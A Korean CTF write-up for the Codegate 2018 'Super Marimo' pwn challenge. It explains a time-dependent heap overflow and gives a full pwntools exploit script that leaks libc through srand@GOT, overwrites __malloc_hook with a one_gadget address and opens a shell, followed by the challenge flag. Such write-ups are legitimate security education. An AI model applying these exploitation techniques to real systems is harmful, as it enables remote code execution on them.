Codegate CTF 2018 Preliminary - Super Marimo (Pwn)

문제 파일 (marimo)

show me the marimo를 통해 marimo를 2개 생성한다.
시간이 지나면 marimo의 size 필드가 커지기 때문에, marimo 0의 profile을 수정할 때 인접한 marimo 1의 구조체(name/profile 포인터)까지 덮어쓰는 overflow가 발생한다.

libc는 로컬환경이랑 같을까 싶어서 시도해봤더니 운좋게도 같았다.

from pwn import *

def cheat(name, profile):
    """Create one marimo through the hidden 'show me the marimo' command.

    The command is sent without waiting for a prompt, so the caller must
    already have consumed the top-level `>> ` menu prompt. The two follow-up
    prompts are answered with `name` and `profile`, and the next menu prompt
    is consumed so the tube is left at a known position for the next helper.

    Uses the module-level pwntools tube `r`; returns None.
    """
    r.sendline('show me the marimo')
    for answer in (name, profile):
        r.sendlineafter('>> ', answer)
    r.recvuntil('>> ')

def view(idx):
    """Open marimo `idx` via the V menu item and return its printed dump.

    Returns the raw text received between the index prompt and the
    '\\n\\n[' that precedes the per-marimo sub-menu (the separator itself is
    dropped). Backs out of the sub-menu with B and consumes the following
    top-level prompt before returning, so the tube is left at a known state.

    Uses the module-level pwntools tube `r`.
    """
    r.sendline('V')
    r.sendlineafter('>> ', str(idx))
    dump = r.recvuntil('\n\n[', drop=True)
    # Return to the top-level menu so the next helper starts from a prompt.
    r.sendline('B')
    r.recvuntil('>> ')
    return dump

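def modify(idx, profile):
    """Overwrite marimo `idx`'s profile with `profile` via V -> M -> B.

    This is the exploit's write primitive. In the main flow, after the size
    field has grown, `modify(0, ...)` rewrites marimo 1's pointers (the leak
    is then read back with `view(1)`), so `profile` typically carries raw
    p64-encoded pointers rather than text.

    NOTE(review): `profile` is sent with sendline(), which appends 0x0a. If
    the service reads the profile with a line-oriented read, a payload whose
    address bytes happen to include 0x0a would be truncated; the recorded run
    did not hit this, but check the encoded addresses before reusing the
    script against a different libc or load address.

    Uses the module-level pwntools tube `r`; returns None.
    """
    r.sendline('V')
    r.sendlineafter('>> ', str(idx))
    # Per-marimo sub-menu prompt; its content is not needed here.
    r.recvuntil('>> ')
    r.sendline('M')
    r.sendlineafter('>> ', profile)
    r.recvuntil('>> ')
    # Back out to the top-level menu so the next helper starts from a prompt.
    r.sendline('B')
    r.recvuntil('>> ')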

# The libc symbol offsets and the one_gadget offset below are tied to one
# exact libc build; the writeup notes the remote libc happened to match the
# author's local one.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF('./marimo_sym')

# Local debugging alternative to the remote connection:
# r = process('./marimo_sym')
# print 'pidof : ', pidof(r)

r = remote('ch41l3ng3s.codegate.kr', 3333)

# Consume the initial menu prompt so the helpers start from a known state.
print(r.recvuntil('>> '))

# Marimo 0 is the one whose profile write overflows; marimo 1 is the victim
# whose name/profile pointers get overwritten (modify(0, ...) below changes
# what view(1) prints).
cheat('AAAA', 'CCCC')
cheat('BBBB', 'DDDD')
# The size grows with wall-clock time (0x32 = 50 seconds); only after the
# wait does the profile write for marimo 0 reach marimo 1.
sleep(0x32)

# Stage 1: point marimo 1's name at srand@GOT and read it back as a libc leak.
# NOTE(review): this assumes srand has already been resolved (called once) by
# the binary; with lazy binding an unresolved GOT slot would hold a PLT stub
# address and the computed libc base would be wrong.
overflow = p64(0) * 7 + p64(elf.got['srand'])
modify(0, overflow)

# Fragile parse of the dump: sixth line, skipping the first 7 characters
# (presumably the field label).
leaked = view(1).split('\n')[5][7:]
srand_addr = u64(leaked.ljust(8, '\x00'))
libc.address = srand_addr - libc.symbols['srand']
# one_gadget offset for this specific libc build (see note at the top).
one_shot = libc.address + 0xf02a4

log.info('leak_srand : ' + hex(srand_addr))
log.info('libc_base : ' + hex(libc.address))
log.info('__malloc_hook : ' + hex(libc.symbols['__malloc_hook']))
log.info('one_shot : ' + hex(one_shot))

# Stage 2: point marimo 1's profile at __malloc_hook, then write the gadget
# address through it by "modifying" marimo 1's profile.
overflow = p64(0) * 8 + p64(libc.symbols['__malloc_hook'])
modify(0, overflow)
modify(1, p64(one_shot))

# Stage 3: creating another marimo presumably allocates, which fires the
# overwritten __malloc_hook.
r.sendline('show me the marimo')

r.interactive()

flag : But_every_cat_is_more_cute_than_Marimo
